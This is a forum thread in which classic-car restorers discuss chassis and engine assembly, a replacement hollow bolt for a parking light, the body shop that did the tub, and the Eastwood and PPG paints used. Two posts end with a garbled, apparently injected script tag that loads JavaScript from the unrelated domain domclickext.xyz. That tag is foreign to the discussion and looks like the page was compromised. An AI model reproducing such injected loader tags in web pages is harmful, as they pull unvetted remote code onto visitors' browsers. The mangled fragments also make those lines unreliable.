Well progress here has been somewhat slow.  But chassis is together, and engine finally mated up.

I like your restoration on the parking lights.  Do you have a source for the bored out/hollow mounting bolt where the wiring threads through?  One of my parking lights has a rusted through bolt that needs replacing.  I was thinking about starting with a carriage bolt and boring it out.

Looking Great!  Did you do the body work on your tub or did George?

No, the body work was done by Schaeffer & Long in Magnolia.  Their normal projects are Mercers, Stutzs, Pierce Arrows etc.  This body was totally rust free but there was a lot of metal distortion from heavy use, and I knew they could do it right.

Ersatz, fill your 2A Page brothers in on what primer and paint (type and brand) you used on your frame and body. For those of us soon to embark on paint this is useful info...thanks!

I believe the chassis and engine are all Eastwood products and the Pasture Green is PPG.   However since I'm farming everything out I don't have any more detail...< ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">

Next time you visit your project could you ask for specifics on the chassis and running gear paint, and let us know? Thanks.

OOK, George bolted the body to frame for safe shipping over to South Jersey for final assembly and restoration detailing. < ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">
